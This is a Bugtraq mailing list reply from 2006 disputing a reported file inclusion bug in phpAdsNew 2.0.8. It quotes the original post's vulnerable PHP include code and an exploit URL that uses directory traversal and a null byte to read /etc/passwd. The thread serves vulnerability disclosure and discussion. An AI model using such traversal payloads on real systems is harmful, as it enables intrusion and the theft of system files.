Bugtraq mailing list archives
Re: phpAdsNew include bug!
From: Wim Godden <security () firstlinknetworks com>
Date: Wed, 18 Oct 2006 03:49:35 +0200
I can't reproduce this on any of our phpAdsNew 2.0.8 installations. As it should, the login prompt is presented. Kind regards, Wim At 20:02 17/10/2006, wacky () ihack pl wrote:
####################################### Autors: - Michał `wacky` Błaszczak - Nobody http://iHACK.pl ####################################### File: modules/phpads/admin/upgrade.php Code: // Load language stringsif (file_exists("../language/".$phpAds_config['language']."/default.lang.php"))include("../language/".$phpAds_config['language']."/default.lang.php"); else { $phpAds_config['language'] = 'english'; include("../language/english/default.lang.php"); } Exploit: http://ihack.pl/phpAdsNew-2.0.8/admin/ upgrade.php?phpAds_config[language]=../../../etc/passwd%00
Current thread:
- phpAdsNew include bug! wacky (Oct 17)
- Re: phpAdsNew include bug! Wim Godden (Oct 18)
- <Possible follow-ups>
- Re: phpAdsNew include bug! matteo (Oct 19)